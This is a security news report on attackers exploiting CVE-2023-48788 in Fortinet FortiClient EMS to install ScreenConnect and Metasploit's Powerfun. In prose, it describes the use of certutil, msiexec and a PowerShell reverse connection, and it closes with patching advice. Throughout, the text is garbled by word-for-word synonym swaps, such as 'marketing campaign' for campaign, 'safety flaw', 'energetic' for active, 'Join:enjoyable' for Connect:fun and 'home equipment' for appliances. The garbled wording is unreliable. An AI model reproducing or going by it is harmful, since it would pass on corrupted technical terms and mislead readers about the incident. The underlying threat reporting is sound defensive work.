Cybersecurity researchers have found a brand new marketing campaign that is exploiting a just lately disclosed safety flaw in Fortinet FortiClient EMS units to ship ScreenConnect and Metasploit Powerfun payloads.
The exercise entails the exploitation of CVE-2023-48788 (CVSS rating: 9.3), a important SQL injection flaw that would allow an unauthenticated attacker to execute unauthorized code or instructions by way of particularly crafted requests.
Cybersecurity agency Forescout is monitoring the marketing campaign below the codename Join:enjoyable owing to using ScreenConnect and Powerfun for post-exploitation.
The intrusion focused an unnamed media firm that had its weak FortiClient EMS gadget uncovered to the web shortly after the discharge of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the following couple of days, the unknown adversary was noticed leveraging the flaw to unsuccessfully obtain ScreenConnect after which set up the distant desktop software program utilizing the msiexec utility.
Nonetheless, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to a different IP tackle.
Additionally detected have been SQL statements designed to obtain ScreenConnect from a distant area (“ursketz[.]com”) utilizing certutil, which was then put in by way of msiexec earlier than establishing connections with a command-and-control (C2) server.
There may be proof to counsel that the risk actor behind it has been energetic since not less than 2022, particularly singling out Fortinet home equipment and utilizing Vietnamese and German languages of their infrastructure.
“The noticed exercise clearly has a guide part evidenced by all of the failed makes an attempt to obtain and set up instruments, in addition to the comparatively very long time taken between makes an attempt,” safety researcher Sai Molige mentioned.
“That is proof that this exercise is a part of a selected marketing campaign, fairly than an exploit included in automated cybercriminal botnets. From our observations, it seems that the actors behind this marketing campaign usually are not mass scanning however selecting goal environments which have VPN home equipment.”
Forescout mentioned the assault shares tactical and infrastructure overlaps with different incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that contain the abuse of CVE-2023-48788 to obtain ScreenConnect and Atera.
Organizations are really useful to use patches supplied by Fortinet to deal with potential threats, monitor for suspicious site visitors, and use an internet utility firewall (WAF) to dam probably malicious requests.
